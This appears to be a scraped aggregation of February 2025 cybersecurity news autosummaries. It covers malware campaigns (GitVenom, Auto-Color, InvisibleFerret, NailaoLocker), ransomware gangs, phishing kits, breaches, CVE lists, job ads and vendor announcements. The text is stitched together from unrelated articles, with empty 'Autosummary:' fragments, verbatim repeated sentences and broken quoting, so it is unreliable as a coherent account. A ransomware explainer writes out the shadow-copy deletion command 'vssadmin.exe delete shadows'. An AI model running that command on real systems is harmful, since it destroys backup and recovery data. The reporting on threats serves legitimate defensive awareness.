“Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and a hacking tool for the video game Valorant,” Kaspersky researchers Georgy Kucherin and João Godinho explained. "Seal Security launched Seal OS, a solution designed to automatically fix vulnerabilities in both Linux operating systems and application code. Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. This support extends to various deployment models, including containers, virtual machines, and bare metal installations. By addressing 99% of Linux vulnerabilities and application code issues, Seal OS provides a solution … More
The post Seal OS fixes vulnerabilities in Linux operating systems appeared first on Help Net Security.
"Autosummary:
Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. "Autosummary:
Once launched with root privileges, it proceeds to install a malicious library implant named "libcext.so.2," copies and renames itself to /var/log/cross/auto-color, and makes modifications to "/etc/ld.preload" for establishing persistence on the host. "Autosummary:
"Autosummary:
Some of the keywords in file names that are targeted include "pass", "account", "auth", "2fa", "wallet", "seedphrase", "recovery", "keepass", "secret", and many others. In samples of the scripts seen by BleepingComputer, the threat actor attempts to steal a large amount of data from breached systems, including: Data from various cryptocurrency wallets, including MetaMask, Ethereum Wallet, Coinbase Wallet, Trust Wallet, Opera Wallet, Brave Wallet, TronLink, Trezor Wallet, and many others. "Autosummary:
The ongoing investigation also discovered that Genea"s compromised patient management systems contained the following types of personal and health data, with the exposed information varying for each affected individual: Full names, emails, addresses, phone numbers, date of birth, emergency contacts, and next of kin, Medicare card numbers, private health insurance details, Defence DA numbers, medical record numbers, patient numbers, Medical history, diagnoses and treatments, medications and prescriptions, patient health questionnaire, pathology and diagnostic test results, notes from doctors and specialists, appointment details, and schedules. "While cybersecurity pros spend much of their time immersed in technical reports, risk assessments, and policy documents, fiction offers a refreshing perspective on security and hacking. Great cyber-themed novels can teach lessons on human psychology, cyber warfare, and the ethics of technology while also entertaining and thought-provoking. Here are eight fiction books that every cybersecurity leader should consider adding to their reading list. Daemon – Daniel Suarez Why read it? → Explores the potential dangers … More
The post What cybersecurity pros read for fun appeared first on Help Net Security.
"Autosummary:
As law enforcement, hackers, and intelligence agencies struggle to contain the daemon’s impact, the book raises real-world concerns about AI, automation, and cybersecurity threats.Russinovich, an expert in Windows security and malware analysis, delivers an authentic portrayal of cyber threats, malware attacks, and incident response. "Autosummary:
The group has been observed rotating its ransomware executable payloads, switching file extensions for encrypted files, and modifying ransom note text, leading the group called by other names such as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. YY is another administrator of Black Basta who is involved in support tasks Trump is one of the aliases for "the group"s main boss" Oleg Nefedov, who goes by the names GG and AA Trump and another individual, Bio, worked together in the now-dismantled Conti ransomware scheme One of the Black Basta affiliates is believed to be a minor aged 17 years Black Basta has begun to actively incorporate social engineering into their attacks following the success of Scattered Spider According to Qualys, the Black Basta group leverages known vulnerabilities, misconfigurations, and insufficient security controls to obtain initial access to target networks. "Autosummary:
Chile power cut: "We were trapped like sardines in the dark" 1 hour ago Vanessa Buschschlüter BBC News Reuters Thousands of people had to make their way home after the Viña del Mar festival was suspended More than eight million households across Chile were left without power on Tuesday afternoon after an electricity transmission line failed, cutting off the electricity supply to much of the country. "Autosummary:
"Autosummary:
Security researcher Oleg Zaytsev, in a report shared with The Hacker News, said the campaign – dubbed 360XSS – affected over 350 websites, including government portals, U.S. state government sites, American universities, major hotel chains, news outlets, car dealerships, and several Fortune 500 companies. "Autosummary:
"Autosummary:
GrassCall[.]net website Source: BleepingComputer Cybersecurity researcher g0njxa, who has been tracking these threat actors, told BleepingComputer that the GrassCall website is a clone of a "Gatherum" website used in a previous campaign. "If a wallet is found, passwords are bruteforced and assets drained, and a payment is issued to the user who made the victim download the fake software," the researcher told BleepingComputer. "Autosummary:
New Ghostwriter campaign targets Ukrainian Government and opposition activists in Belarus Pierluigi Paganini February 26, 2025 February 26, 2025 A Ghostwriter campaign using a new variant of PicassoLoader targets opposition activists in Belarus, and Ukrainian military and government organizations.The attack, likely tied to Belarus’ Jan 26, 2025 election, used an obfuscated VBA macro to execute malicious code. "Autosummary:
"Autosummary:
"We today deploy over 800 AI models across 350 use cases, and expect the measured economic impact of these to exceed S$1bn ($745m; £592m) in 2025," he added. "Application Security Engineer Binance | UAE | Remote – View job details As a Application Security Engineer, you will enhance and maintain the security postures of Binance’s affiliates specializing in DeFi and Web3. Serve as the first responder for security issues identified through penetration tests, bug bounty programs, and assessments. Analyze penetration test findings and implement code-level solutions to resolve vulnerabilities. Application Security Engineer TheFork | France | On-site – View job details As an … More
The post Cybersecurity jobs available right now: February 25, 2025 appeared first on Help Net Security.
"Autosummary:
Oversee and, when necessary, contribute to the configuration and operation of a comprehensive suite of security tools and technologies, including firewalls, IDS/IPS, WAF, proxies, email security, DLP, IRM/DRM, ATP, network infrastructure, and endpoint protection solutions. Specialist – Network Security Eaton | USA | Remote – View job details As a Specialist – Network Security, you will monitor technology, platform, and systems to ensure required performance, availability, and capacity. Security Engineer – Offensive Security TikTok | United Kingdom | On-site – View job details As a Security Engineer – Offensive Security, you will Cconduct vulnerability research of the most critical systems of core product ecosystems such as TikTok, TikTok LIVE, Lemon8, and others. Senior IT Security Specialist Röchling Automotive | Italy | On-site – View job details As a Senior IT Security Specialist, you will develop, implement and keep updated security policies, protocols, and procedures. "Autosummary:
" The activity has singled out government agencies and industrial organizations, particularly manufacturing, construction, information technology, telecommunications, healthcare, power and energy, and large-scale logistics and transportation, in Taiwan, Malaysia, China, Japan, Thailand, South Korea, Singapore, the Philippines, Vietnam, and Hong Kong. "Autosummary:
"Autosummary:
By submitting InvisibleFerret to ANY.RUN"s Interactive Sandbox, we can analyze its behavior in real time: View InvisibleFerret analysis session InvisibleFerret behavior analyzed by ANY.RUN sandbox The malware starts by collecting system information, such as OS version, hostname, username, and geolocation, using services like ip-api.com, a method also used by cryptocurrency drainers. Credentials and personal data theft by Lumma Stealer InvisibleFerret: The Silent Threat Lurking in Fake Job Offers In a wave of social engineering attacks, cybercriminals have been leveraging InvisibleFerret, a stealthy Python-based malware, to compromise unsuspecting victims. Once executed, Lumma Stealer initiates additional malicious activities, including downloading and running other threats like SectopRAT, Vidar, Cobeacon, and additional Lumma Stealer variants.Key TTPs include: Persistence & Execution: Modifies registry startup keys, executes scripts via wscript.exe. Discovery: Reads computer name, checks system language, and accesses environment variables. View NetSupport RAT analysis session Malicious archive opened inside ANY.RUN sandbox When NetSupport RAT infects a system, it immediately establishes a connection with a command-and-control (C2) server, allowing attackers to operate the compromised machine remotely. Once installed, this RAT grants attackers full control over the victim"s system, allowing activities such as real-time screen monitoring, file manipulation, and execution of arbitrary commands. AES encryption used by AsyncRAT Lumma Stealer: GitHub-Based Distribution In early 2025, cybersecurity experts uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware. "Autosummary:
"By modifying specific parts of the driver while preserving its digital signature, the attackers bypassed common detection methods, including the latest Microsoft Vulnerable Driver Blocklist and LOLDrivers detection mechanisms, allowing them to evade detection for months," Check Point said. "Autosummary:
"By hijacking YouTube accounts to impersonate professional players like s1mple, NiKo, and donk, cybercriminals are luring fans into fraudulent CS2 skin giveaways that result in stolen Steam accounts, cryptocurrency theft, and the loss of valuable in-game items," the Romanian cybersecurity company said. "Autosummary:
"Autosummary:
Founded in 1989, LANIT offers a wide range of IT solutions, including system integration, software development, cybersecurity, cloud services, and IT consulting. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. SSN Breached: yes DISA states that it’s not aware of any attempts to abuse the stolen information: “While we are unaware of any attempted or actual misuse of any information involved in this incident, we are providing you with information about the incident and steps you can take to protect yourself, should you feel it necessary.”Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Halcyon announced Halcyon Ransomware Detection and Recovery (RDR), a no-cost integrated service that is now included with every deployment of the Halcyon Anti-Ransomware Platform. Most 24/7 threat monitoring and response services are not included with software platform purchases and are instead only offered at a significant additional cost. Halcyon offers 24/7 ransomware protection from a team of experts who investigate and respond to every single alert triggered in the Halcyon platform at no additional cost. … More
The post Halcyon RDR boosts ransomware protection for organizations appeared first on Help Net Security.
"Autosummary:
Halcyon RDR is powered by Halcyon RISE, an elite team of experts in ransomware TTPs, cryptography, threat intelligence, malware reverse engineering, and ransomware response. "Autosummary:
" If the malware runs with root privileges, it installs a malicious library implant (libcext.so.2), disguised as the legitimate libcext.so.0 library, copies itself to a system directory (/var/log/cross/auto-color), and modifies "/etc/ld.preload" to ensure the implant executes before any other system library. "Autosummary:
"DISA Global Solutions, a Texas-based company that provides employment screening services (including drug and alcohol testing and background checks) for over 55,000 organizations, has suffered a cyber incident that led to a data breach, which resulted in the potential compromise of personal and financial information of over 3.3 million individuals. What is known about the breach? DISA discovered the breach on April 22, 2024, and the subsequent investigation revealed that an unauthorized third party accessed … More
The post Background check, drug testing provider DISA suffers data breach appeared first on Help Net Security.
"Autosummary:
"Silver Fox, a China-based threat actor that may or may not be backed by the Chinese government, has been delivering the ValleyRAT backdoor to unsuspecting users by disguising the malware as legitimate healthcare app (the Philips DICOM viewer), a Windows text editor (EmEditor), and system drivers and utilities. The ValleyRAT malware How the malware gets served to users is unknown. In previous attacks attributed to Silver Fox, the group has used SEO poisoning and / … More
The post China-based Silver Fox spoofs healthcare app to deliver malware appeared first on Help Net Security.
"Autosummary:
But, over the past year, they’ve also started focusing on a broader range of targets, including gamers; e-commerce, finance, sales, accounting, and management professionals / enterprises; and national institutions and security companies. "Have you ever heard anyone earnestly ask in a business, “Who owns legal?” or “Who sets the financial strategy?” Probably not – it should be obvious, right? Yet, when it comes to cybersecurity, the question of ownership still seems to spark endless debates. That might have been understandable back in the 1990s when key security roles like the CISO were still being ironed out. But these days, it should be a serious red flag. Security … More
The post Cybersecurity needs a leader, so let’s stop debating and start deciding appeared first on Help Net Security.
"Autosummary:
This means setting clear policies, defining risk tolerance and, most importantly, ensuring that security decisions are made based on actual business needs, not internal politics. Without clear governance, security efforts easily become reactive, disjointed, and prone to being overruled by whoever shouts the loudest in the boardroom.Yet, too often, security is still treated as an isolated function, left to operate in a vacuum. But the real issue isn’t just finding the right person; it’s ensuring they have the authority, resources, and business-wide support to execute effectively. "Autosummary:
This includes Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, and data from various apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp. "Autosummary:
The threat cluster has been assessed to be an extension of a long-running campaign mounted by a Belarus-aligned threat actor dubbed Ghostwriter (aka Moonscape, TA445, UAC-0057, and UNC1151) since 2016. "Autosummary:
"Autosummary:
Specifically, the internet company said it would continue to support both the "blockingWebRequest" and "declarativeNetRequest" APIs, corresponding to MV3 and MV2, respectively, allowing extensions like uBlock Origin to continue working as usual. "Autosummary:
"My business, from which I have paid so much tax, post-paid pentest, I created only to make us all, in our United States of America, a more secure place to live.LockBit taunts FBI Director Kash Patel with alleged “Classified” leak threat Pierluigi Paganini February 25, 2025 February 25, 2025 LockBit claims to have “classified information” for FBI Director Kash Patel that could “destroy” the agency if leaked. "Autosummary:
Reuters news agency reported that the world"s largest copper mine, Escondida, was without power, citing a source close to the matter. "Autosummary:
This week"s list includes — CVE-2025-24989 (Microsoft Power Pages), CVE-2025-23209 (Craft CMS), CVE-2024-12284 (Citrix NetScaler Console and NetScaler Agent), CVE-2025-26465, CVE-2025-26466 (OpenSSH), CVE-2025-21589 (Juniper Networks Session Smart Router), CVE-2024-12510, CVE-2024-12511 (Xerox VersaLink C7025 Multifunction printer), CVE-2025-0366 (Jupiter X Core plugin), CVE-2024-50379, CVE-2024-56337, CVE-2024-52316, CVE-2024-50379, CVE-2024-56337 (Atlassian), CVE-2024-53900, CVE-2025-23061 (Mongoose library), CVE-2025-26776 (NotFound Chaty Pro plugin), CVE-2025-26763 (MetaSlider Responsive Slider by MetaSlider plugin), CVE-2024-54756 (ZDoom Team GZDoom), CVE-2024-57401 (Uniclare Student Portal), CVE-2025-20059 (Ping Identity PingAM Java Policy Agent), CVE-2025-0868 (DocsGPT), CVE-2025-1023, CVE-2025-1132, CVE-2025-1133, CVE-2025-1134, CVE-2025-1135 (ChurchCRM), CVE-2024-57045 (D-Link DIR-859 router), CVE-2024-57050 (TP-Link WR840N v6 router), CVE-2024-57049 (TP-Link Archer c20 router), CVE 2025-26794 (Exim), CVE-2024-50608, CVE-2024-50609 (Fluent Bit), CVE-2024-54961 (Nagios XI), CVE-2025-23115, and CVE-2025-23116 (Ubiquiti UniFi Protect Camera)."The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding in about half the cases, the victims did not receive any Threat Notifications from Apple."The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding in about half the cases, the victims did not receive any Threat Notifications from Apple.The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others.The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others.Winnti Stages RevivalStone Campaign Targeting Japan — Winnti, a subgroup with the APT41 Chinese threat activity cluster, targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 that delivered a wide range of malware, including a rootkit that"s capable of intercepting TCP/IP Network Interface, as well as creating covert channels with infected endpoints within the intranet.This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool that"s designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit.This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool that"s designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit.Two Estonian Nationals Plead Guilty in $577M Cryptocurrency Fraud Scheme — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty for the operation of a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of people from across the world, including in the U.S. — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty for the operation of a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of people from across the world, including in the U.S. 📰 Around the Cyber World U.S. Army Soldier Pleads Guilty to AT&T and Verizon Hacks — Cameron John Wagenius (aka Kiberphant0m), a 20-year-old U.S. Army soldier, who was arrested early last month over AT&T and Verizon hacking, has pleaded guilty to two counts of unlawful transfer of confidential phone records information in 2024.The incident makes it the biggest-ever cryptocurrency heist reported to date, dwarfing that of Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million). "Autosummary:
Disabling Security Defenses To ensure uninterrupted encryption and prevent data recovery attempts during the attack, ransomware attempts to shut down security services such as: ✔ Antivirus & EDR (Endpoint Detection and Response) ✔ Backup agents ✔ Database systems 💡 How it works: Attackers use administrative commands or APIs to disable services like Windows Defender and backup solutions. 💡 How it works: Ransomware executes commands like: powershell vssadmin.exe delete shadows By wiping these backups, attackers ensure total data lockdown, increasing pressure on victims to pay the ransom. Indicators of Compromise (IOCs): What to Look Out For If you detect shadow copy deletions, process injections, or security service terminations, you may already be in the pre-encryption phase - but detecting these IOCs is a critical step to prevent the attack from unfolding. Let"s unpack the stages of a ransomware attack, how to stay resilient amidst constantly morphing indicators of compromise (IOCs), and why constant validation of your defense is a must to stay resilient. 💡 Defensive trick: Some security tools preemptively create mutexes associated with known ransomware strains, tricking the malware into thinking it"s already active - causing it to self-terminate. "Autosummary:
Initially presented as a harmless Finance management application, it downloads a fraud loan app from an external download URL, which once installed, gains extensive permissions to access sensitive data, including files, contacts, call logs, SMS, clipboard content, and even the camera.” concludes the report. "Autosummary:
By manipulating the "do_repack_manual" function, an attacker redirects a privileged folder using symlinks, tricks Parallels into writing attacker-controlled files to a root-owned path, and replaces "p7z_tool," which gets executed as root. "A proof-of-concept (PoC) exploit for four critical Ivanti Endpoint Manager vulnerabilities has been released by Horizon3.ai researchers. The vulnerabilities – CVE-2024-10811, CVE-2024-13161, CVE-2024-13160 and CVE-2024-13159 – may be exploited by remote, unauthenticated attackers to leverage Ivanti EPM machine account credentials for relay attacks and, ultimately, to compromise the Ivanti EPM server. “Compromising the Endpoint Manager server itself would lead to the ability to compromise all of the EPM clients, making this avenue especially impactful,” Horizon3.ai … More
The post PoC exploit for Ivanti Endpoint Manager vulnerabilities released (CVE-2024-13159) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" ACR Stealer, previously distributed via Hijack Loader malware, is capable of harvesting a wide range of information from compromised systems, including files, web browser data, and cryptocurrency wallet extensions. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: A PostgreSQL zero-day was also exploited in US Treasury hack (CVE-2025-1094) The suspected Chinese state-sponsored hackers who breached workstations of several US Treasury employees in December 2024 did so by leveraging not one, but two zero-days, according to Rapid7 researchers. Unlocking OSINT: Top books to learn from Discover the top Open-Source Intelligence (OSINT) books in this curated list. Mastering the … More
The post Week in review: PostgreSQL 0-day exploited in US Treasury hack, top OSINT books to learn from appeared first on Help Net Security.
"Autosummary:
Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning. Mastering the cybersecurity tightrope of protection, detection, and response In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation. "Autosummary:
"Autosummary:
"Autosummary:
An ongoing PayPal email scam exploits the platform"s address settings to send fake purchase notifications, tricking users into granting remote access to scammers For the past month, BleepingComputer and others [1, 2] have received emails from PayPal stating, "You added a new address. When they add the scam address to PayPal, the payment platform will email a confirmation to the threat actor"s email, which will then forward it to the Microsoft 365 account, which then forwards it to everyone on the mailing list, as shown in the flow chart below. "In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation. Wisniewski notes that cyber resilience is more crucial than mere defense, with AI playing a key role in managing threats, and calls for ongoing improvements, transparency, and proactive measures. With ransomware payments decreasing, some cybercriminals are shifting toward data-centric extortion rather … More
The post Mastering the cybersecurity tightrope of protection, detection, and response appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation. Wisniewski notes that cyber resilience is more crucial than mere defense, with AI playing a key role in managing threats, and calls for ongoing improvements, transparency, and proactive measures. That isn’t to say we shouldn’t be migrating to quantum resistant cryptography as soon as we possibly can, as those same cybercriminals, if they gain the ability in the future, will likely steal things like encrypted backups and still attempt using them for extortion. "Symbiotic Security announced updates to its application and integrated development environment (IDE) extension, further streamlining security for developers by improving usability, accessibility, and real-time security insights. The demand for real-time security solutions is growing as organizations seek to shift security left – making it an earlier part of the software development process to improve efficiency and reduce cost. Symbiotic Security’s software helps developers and security teams proactively manage risk. The latest update empowers developers and … More
The post Symbiotic Security improves software vulnerability detection in the coding process appeared first on Help Net Security.
"Autosummary:
This includes just-in-time training, links to resources, and examples of vulnerable code to illustrate different use cases This announcement comes on the heels of Symbiotic Security’s November launch, when the company introduced the industry’s first real-time security solution for software development, combining detection, remediation, and just-in-time training. "Autosummary:
"In addition, we have observed the threat actor capturing SNMP, TACACS, and RADIUS traffic, including the secret keys used between network devices and TACACS/RADIUS servers," Talos noted. "Autosummary:
"Autosummary:
The two vulnerabilities are: CVE-2025-23209 Craft CMS Code Injection Vulnerability CVE-2025-0111 Palo Alto Networks PAN-OS File Read Vulnerability Craft is a flexible, user-friendly CMS, affected by a code injection vulnerability, tracked as CVE-2025-23209 (CVSS score of 8.1), which could lead to remote code execution (RCE). "Autosummary:
The latest iteration of the phishing suite "represents a significant shift in criminal capabilities, reducing the barrier to entry for bad actors to target any brand with complex, customizable phishing campaigns," Netcraft said in a new analysis. "Autosummary:
Prof Alan Woodward - a cyber-security expert at Surrey University - said it was a "very disappointing development" which amounted to "an act of self harm" by the government. "Autosummary:
However, upon installation, they request excessive permissions, allowing the apps to steal personal data such as contacts, call logs, SMS messages, photos, and device location. "Autosummary:
"Autosummary:
"Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: 1Password – Secure every app, device, and identity – even the unmanaged ones at 1password.com/smashing. "The third quarter of 2024 saw a dramatic shift in the types of malware detected at network perimeters, according to a new WatchGuard report. The report’s key findings include a 300% increase quarter over quarter of endpoint malware detections, highlighted by growing threats that exploit legitimate websites or documents for malicious purposes as threat actors turn to more social engineering tactics to execute their attacks. While Microsoft documents like Word and Excel have long been … More
The post 300% increase in endpoint malware detections appeared first on Help Net Security.
"Autosummary:
The report’s key findings include a 300% increase quarter over quarter of endpoint malware detections, highlighted by growing threats that exploit legitimate websites or documents for malicious purposes as threat actors turn to more social engineering tactics to execute their attacks. "Autosummary:
"Autosummary:
"Autosummary:
Palo Alto Networks warns that CVE-2025-0111 flaw is actively exploited in attacks Pierluigi Paganini February 20, 2025 February 20, 2025 Palo Alto Networks warns that the vulnerability CVE-2025-0111 is actively exploited with two other flaws to compromise PAN-OS firewalls. Palo Alto Networks warns that threat actors are chaining the vulnerability CVE-2025-0111 with two other vulnerabilities, tracked as CVE-2025-0108 with CVE-2024-9474, to compromise PAN-OS firewalls. "Autosummary:
Orange has shared several hypotheses for the attacks, including false flag operations meant to distract, strategic data theft operations doubled with revenue generation, and, more likely, a Chinese cyberespionage group "moonlighting" on the side to earn some money. "Norton is setting the standard for scam protection with a new range of AI-powered features fully integrated in Norton Cyber Safety products to help protect people from the most widespread cyberthreat of our time. Like the first domino tipping over and setting off a chain reaction, scams are the initial event that can trigger a series of serious attacks, including identity theft and financial fraud. The Company reports that 90% of all cyberthreats now originate … More
The post Norton’s AI-powered features defend against scams and social engineering threats appeared first on Help Net Security.
"Autosummary:
In addition to Genie Scam Protection, Norton 360 with LifeLock customers also have Genie Scam Protection Pro, which includes: Safe call: Uses AI to automatically block scam calls, or labels incoming calls as scam, junk, or as a business, so people know if they should answer. Available starting today in the US across the Norton Cyber Safety product lineup, Genie Scam Protection and Genie Scam Protection Pro provide AI protection in all the usual hotbeds for scams: texts, phone calls, emails, and web. "Autosummary:
" Microsoft Power Pages is a low-code, SaaS-based web development platform that allows users to create, host, and manage secure external-facing business websites. "Autosummary:
In related news, the OpenSSH project has released security updates for two vulnerabilities: a man-in-the-middle (MitM) flaw (CVE-2025-26465) and a denial-of-service bug (CVE-2025-26466). "Autosummary:
In addition to this new feature, the upcoming release, named "Darcula Suite," also lifts technical skills requirements, a new user-friendly admin dashboard, IP and bot filtering, campaign performance measurement, and automated credit card theft/digital wallet loading. "A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning. Even users who have gotten wise to the fake “missed package” or “package confirmation” notices from their national post or delivery services may not be ready the variety of phishing … More
The post Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand appeared first on Help Net Security.
"Autosummary:
Citing SecAlliance security researcher Ford Merrill, Krebs further described how criminals then used those cards/wallets to steal money by: Setting up fake e-commerce businesses on Stripe or Zelle and making transactions through them Performing “Tap-to-pay” on point-of-sale (PoS) terminals they’ve obtained Using an Android app that can relay valid NFC-enabled tap-to-pay transactions from phones located across the globe, either to pay via a PoS terminal or take money out of ATMs "Autosummary:
InvisibleFerret is a modular Python malware that retrieves and executes three additional components - pay , which collects information and acts as a backdoor that"s capable of accepting remote commands from an attacker-controlled server to log keystrokes, capture clipboard content, run shell commands, exfiltrate files and data from mounted drives, as well as install the AnyDesk and browser module, and gather information from browser extensions and password managers , which collects information and acts as a backdoor that"s capable of accepting remote commands from an attacker-controlled server to log keystrokes, capture clipboard content, run shell commands, exfiltrate files and data from mounted drives, as well as install the AnyDesk and browser module, and gather information from browser extensions and password managers bow , which is responsible for stealing login data, autofill data, and payment information stored in Chromium-based browsers like Chrome, Brave, Opera, Yandex, and Edge , which is responsible for stealing login data, autofill data, and payment information stored in Chromium-based browsers like Chrome, Brave, Opera, Yandex, and Edge adc, which functions as a persistence mechanism by installing the AnyDesk remote desktop software ESET said the primary targets of the campaign are software developers working in cryptocurrency and decentralized finance projects across the world, with significant concentrations reported in Finland, India, Italy, Pakistan, Spain, South Africa, Russia, Ukraine, and the U.S. "The attackers don"t distinguish based on geographical location and aim to compromise as many victims as possible to increase the likelihood of successfully extracting funds and information. "Autosummary:
The intrusions culminate with the use of Windows Management Instrumentation (WMI) to transmit three files, a legitimate executable signed by Beijing Huorong Network Technology Co., Ltd ("usysdiag.exe"), a loader named NailaoLoader ("sensapi.dll"), and NailaoLocker ("usysdiag.exe.dat"). "Autosummary:
" The South Korean cybersecurity firm said the malware is propagated in the form of a compressed ZIP archive that includes the legitimate executable as well as the DLLs that are sideloaded to launch the malware - Documents2012.exe, a renamed version of the legitimate jarsigner.exe binary jli.dll, a DLL file that"s modified by the threat actor to decrypt and inject concrt140e.dll concrt140e.dll, the XLoader payload The attack chain crosses over to the malicious phase when "Documents2012.exe" is run, triggering the execution of the tampered "jli.dll" library to load the XLoader malware. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
These attacks have targeted well-known manufacturers, including Fortinet, Barracuda, SonicWall, Check Point, D-Link, Cisco, Juniper, NetGear, and Sophos. "Compliance & Privacy Specialist McKesson | Remote – View job details As a Compliance & Privacy Specialist, you will identify potential gaps, establish and maintain policies and procedures to guide the business in complying with regulatory requirements, create and deliver workforce education on privacy and data protection standards, establish and enhance auditing and monitoring activities along with corresponding metrics, and investigate potential policy and regulatory infractions within the business. Cybersecurity Analyst Messer | On-site – … More
The post Cybersecurity jobs available right now in the USA: February 20, 2025 appeared first on Help Net Security.
"Autosummary:
Security Engineer II, Stores Application Security Amazon | On-site – View job details As a Security Engineer II, Stores Application Security, you will you will be responsible for creating, updating, and maintaining threat models for various software projects, conducting manual and automated secure code reviews (primarily in Java, Python, and JavaScript), developing security automation tools, and performing adversarial security analysis using cutting-edge tools. Intern – Cybersecurity Analyst KPI Solutions | On-site – View job details As an Intern – Cybersecurity Analyst, you will conduct real-time 24/7 security monitoring and intrusion detection analysis for all KPI networks, servers, cloud platforms, and endpoint (laptop, desktop, mobile, and internet of things/IOT) systems. Cyber Security Engineer, Compliance – SOX Community Health Systems | Remote – View job details As a Cyber Security Engineer, Compliance – SOX, you will coordinate periodic access reviews for key SOX systems and applications, including running reports in multiple systems, analyzing data, and investigating exceptions for potential risk exposure. "Autosummary:
Orange Cyberdefense CERT uncovered a malware campaign, tracked as The Green Nailao campaign, that targeted European organizations, including healthcare, in late 2024, using ShadowPad, PlugX, and the previously undocumented NailaoLocker ransomware.NailaoLocker ransomware targets EU healthcare-related entities Pierluigi Paganini February 20, 2025 February 20, 2025 NailaoLocker ransomware is a new threat that targeted European healthcare organizations from June to October 2024. "Autosummary:
Some of their victims include German defense contractor Rheinmetall, Hyundai"s European division, BT Group(formerly British Telecom), U.S. healthcare giant Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada. "Autosummary:
Cisco reported that Salt Typhoon used stolen credentials, captured network configs, and intercepted SNMP, TACACS, and RADIUS traffic to gather more credentials for further access.Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers Pierluigi Paganini February 20, 2025 February 20, 2025 China-linked cyber espionage group Salt Typhoon uses custom malware JumbledPath to on spy U.S. telecom providers. The China-linked APT group is still targeting telecommunications providers worldwide, and according to a report recently published by Recorded Future’s Insikt Group, the threat actors has breached more U.S. telecommunications providers by exploiting unpatched Cisco IOS XE network devices. "Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility … More
The post Kunai: Open-source threat hunting tool for Linux appeared first on Help Net Security.
"Autosummary:
Plus, it seamlessly integrates with other open-source tools, supporting YARA rules for file scanning and connecting to MISP for real-time IoC scanning: ensuring security teams have the flexibility and power they need,” Jerome explained. "The cybersecurity startup landscape is at a crossroads. As venture-backed companies strive for successful exits, the bar has risen dramatically, requiring more funding, higher revenue, and faster growth than ever before. In this Help Net Security video, Mark Kraynak, Founding Partner at Acrew Capital, breaks down the Exit Escape Velocity for Cybersecurity Startups report to explore the challenges of IPOs and M&A deals in the post-COVID era.
The post VC-backed cybersecurity startups and the exit crunch appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
